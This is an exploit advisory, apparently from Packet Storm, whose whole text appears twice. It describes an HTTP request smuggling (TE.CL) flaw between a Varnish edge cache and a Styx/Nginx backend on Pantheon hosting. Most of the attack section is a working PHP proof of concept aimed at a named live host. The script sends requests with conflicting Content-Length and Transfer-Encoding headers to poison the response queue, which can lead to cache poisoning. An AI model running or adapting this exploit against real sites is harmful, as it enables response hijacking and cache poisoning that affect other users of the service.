Description
Proof of concept exploit that demonstrates an HTTP request smuggling vulnerability between Varnish and Styx / Nginx...
Basic Information
ID
PACKETSTORM:213290
Published
Dec 24, 2025 at 00:00
Affected Product
Affected Versions
=============================================================================================================================================
| # Title : HTTP Request Smuggling (TE.CL) via Edge Cache Misconfiguration (Varnish ↔ Styx) |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://pantheon.io/ |
=============================================================================================================================================
[+] References :
[+] Summary : A critical HTTP Request Smuggling (TE.CL) vulnerability exists due to inconsistent HTTP request parsing
between the Pantheon edge caching layer (Varnish) and the backend routing layer (Styx / Nginx).
The edge layer accepts ambiguous requests containing both Content-Length and Transfer-Encoding,
while the backend correctly prioritizes Transfer-Encoding: chunked.
This discrepancy allows an attacker to smuggle arbitrary HTTP requests, resulting in response queue poisoning and potential web cache poisoning.
[+] Technical Details :
Frontend (Varnish Edge Cache)
Parses requests using Content-Length
Does not reject dual-header ambiguity (CL + TE)
Backend (Pantheon Styx / Nginx)
[+] Prioritizes Transfer-Encoding: chunked
Leaves smuggled payload queued for the next request
[+] Vulnerability Class :
Desynchronization → Response Queue Poisoning → Cache Poisoning
[+] Proof of Concept (PoC)
The following PoC demonstrates request smuggling by injecting a benign smuggled request and observing its response being returned for a subsequent legitimate request.
[+] PoC : poc_final.php
<?php
/**
* Proof of Concept: HTTP Request Smuggling (TE.CL)
* Target: Pantheon-hosted application
*/
error_reporting(E_ALL);
$host = "www.bugcrowd.com"; // Pantheon-hosted example
$asset = "/etc/designs/bugcrowd/clientlibs/main.js";
$poc_mark = "PANTHEON_TECL_POC_" . rand(100, 999);
$fp = fsockopen("ssl://$host", 443, $errno, $errstr, 15);
if (!$fp) die("[-] Connection Failed: $errstr");
// Smuggled request
$smuggled = "GET /nonexistent-$poc_mark HTTP/1.1\r\n";
$smuggled .= "Host: $host\r\n";
$smuggled .= "Connection: keep-alive\r\n\r\n";
// Main TE.CL request
$body = "0\r\n\r\n" . $smuggled;
$request = "POST / HTTP/1.1\r\n";
$request .= "Host: $host\r\n";
$request .= "Transfer-Encoding: chunked\r\n";
$request .= "Content-Length: 4\r\n";
$request .= "Connection: keep-alive\r\n\r\n";
$request .= $body;
fwrite($fp, $request);
usleep(600000);
// Trigger request
fwrite($fp, "GET $asset HTTP/1.1\r\nHost: $host\r\n\r\n");
$response = "";
while (!feof($fp)) {
$response .= fgets($fp, 1024);
}
fclose($fp);
if (strpos($response, $poc_mark) !== false) {
echo "[+] SUCCESS: Response queue poisoned via TE.CL.\n";
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
| # Title : HTTP Request Smuggling (TE.CL) via Edge Cache Misconfiguration (Varnish ↔ Styx) |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://pantheon.io/ |
=============================================================================================================================================
[+] References :
[+] Summary : A critical HTTP Request Smuggling (TE.CL) vulnerability exists due to inconsistent HTTP request parsing
between the Pantheon edge caching layer (Varnish) and the backend routing layer (Styx / Nginx).
The edge layer accepts ambiguous requests containing both Content-Length and Transfer-Encoding,
while the backend correctly prioritizes Transfer-Encoding: chunked.
This discrepancy allows an attacker to smuggle arbitrary HTTP requests, resulting in response queue poisoning and potential web cache poisoning.
[+] Technical Details :
Frontend (Varnish Edge Cache)
Parses requests using Content-Length
Does not reject dual-header ambiguity (CL + TE)
Backend (Pantheon Styx / Nginx)
[+] Prioritizes Transfer-Encoding: chunked
Leaves smuggled payload queued for the next request
[+] Vulnerability Class :
Desynchronization → Response Queue Poisoning → Cache Poisoning
[+] Proof of Concept (PoC)
The following PoC demonstrates request smuggling by injecting a benign smuggled request and observing its response being returned for a subsequent legitimate request.
[+] PoC : poc_final.php
<?php
/**
* Proof of Concept: HTTP Request Smuggling (TE.CL)
* Target: Pantheon-hosted application
*/
error_reporting(E_ALL);
$host = "www.bugcrowd.com"; // Pantheon-hosted example
$asset = "/etc/designs/bugcrowd/clientlibs/main.js";
$poc_mark = "PANTHEON_TECL_POC_" . rand(100, 999);
$fp = fsockopen("ssl://$host", 443, $errno, $errstr, 15);
if (!$fp) die("[-] Connection Failed: $errstr");
// Smuggled request
$smuggled = "GET /nonexistent-$poc_mark HTTP/1.1\r\n";
$smuggled .= "Host: $host\r\n";
$smuggled .= "Connection: keep-alive\r\n\r\n";
// Main TE.CL request
$body = "0\r\n\r\n" . $smuggled;
$request = "POST / HTTP/1.1\r\n";
$request .= "Host: $host\r\n";
$request .= "Transfer-Encoding: chunked\r\n";
$request .= "Content-Length: 4\r\n";
$request .= "Connection: keep-alive\r\n\r\n";
$request .= $body;
fwrite($fp, $request);
usleep(600000);
// Trigger request
fwrite($fp, "GET $asset HTTP/1.1\r\nHost: $host\r\n\r\n");
$response = "";
while (!feof($fp)) {
$response .= fgets($fp, 1024);
}
fclose($fp);
if (strpos($response, $poc_mark) !== false) {
echo "[+] SUCCESS: Response queue poisoned via TE.CL.\n";
}
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================